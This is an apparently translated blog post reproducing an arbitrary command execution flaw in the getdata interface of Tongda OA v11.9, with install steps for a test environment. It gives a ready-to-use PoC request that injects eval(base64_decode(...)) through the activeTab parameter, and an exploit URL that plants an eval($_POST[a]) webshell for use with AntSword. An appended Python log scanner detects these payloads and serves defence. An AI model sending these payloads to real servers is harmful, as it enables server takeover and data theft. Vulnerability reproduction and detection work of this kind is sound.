Tongda OA v11.9 getdata arbitrary command execution vulnerability reproduction + exploitation

1. Product introduction

Tongda OA (Office Anywhere network intelligent office system) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform shaped by Chinese enterprise management practice. It includes process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office and more, helping users reduce communication and management costs and improve production and decision-making efficiency.

2. Vulnerability overview

The getdata interface of Tongda OA v11.9 has an arbitrary command execution vulnerability. Through it an attacker can execute arbitrary commands on the server and take control of it.

3. Scope of influence

     Tongda OA <= v11.9

4. Reproduce the environment

Tongda OA v11.9 built on Windows Server 2019

Installation package download address: https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe

After downloading, double-click the installer, then set the access address and port to complete the installation.

5. Vulnerability recurrence

Access the vulnerable environment, capture the request with Burp and send it to the Repeater module to reproduce.

POC

GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22[base64加密的命令]%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=6nfieutt27f4d98vvp5029a472; KEY_RANDOMDATA=17755
Upgrade-Insecure-Requests: 1

Have it output a string directly here, for example: echo test111111111111;

Successful output

6. Exploitation 

Construct the exploit

http://x.x.x.x:x/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage

Write a one-line webshell directly and connect with AntSword.

7. Fix

     Upgrade to a safe version.
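A log-side check added here as an editor's example (not code from the original post or from Tongda): it flags requests to the getdata endpoint whose activeTab value carries PHP code such as eval( or base64_decode(, the markers seen in the PoC above. The sample access-log lines are constructed, and the log format, marker list and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint from the write-up and the injection markers used in its PoC payload.
GETDATA_PATH = "/general/appbuilder/web/portal/gateway/getdata"
MARKERS = ("eval(", "base64_decode(", "$_post", "$_get", "system(", "passthru(")

def is_suspicious_request(path_and_query: str) -> bool:
    """True if the request targets getdata with an activeTab value that
    carries PHP code, as in the PoC above."""
    parts = urlsplit(path_and_query)
    if parts.path != GETDATA_PATH:
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    for raw in qs.get("activeTab", []):
        # parse_qs already decodes once; decode again for double-encoded values
        value = unquote(raw).lower()
        if any(m in value for m in MARKERS):
            return True
        # the PoC closes the string with %27 and opens a PHP comment with /*
        if "'" in value and "/*" in value:
            return True
    return False

# Constructed sample access-log lines (Apache combined format), not real data.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Mar/2023:10:01:02 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB0ZXN0Ow==%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1" 200 512
203.0.113.5 - - [20/Mar/2023:10:02:15 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[a]))%3B/*&id=19&module=Carouselimage HTTP/1.1" 200 0
198.51.100.7 - - [20/Mar/2023:10:03:44 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=1&id=19&module=Carouselimage HTTP/1.1" 200 2048
198.51.100.7 - - [20/Mar/2023:10:04:01 +0800] "GET /general/login_code.php HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def scan_log(text: str) -> list:
    """Return (ip, timestamp, target) for every line matching this exploit pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious_request(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits

if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {target}")
```

Run it against the real access log of the OA server; the two constructed lines from the PoC are flagged while the normal getdata call and the unrelated request are not.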


Source: blog.csdn.net/qq_41904294/article/details/129689610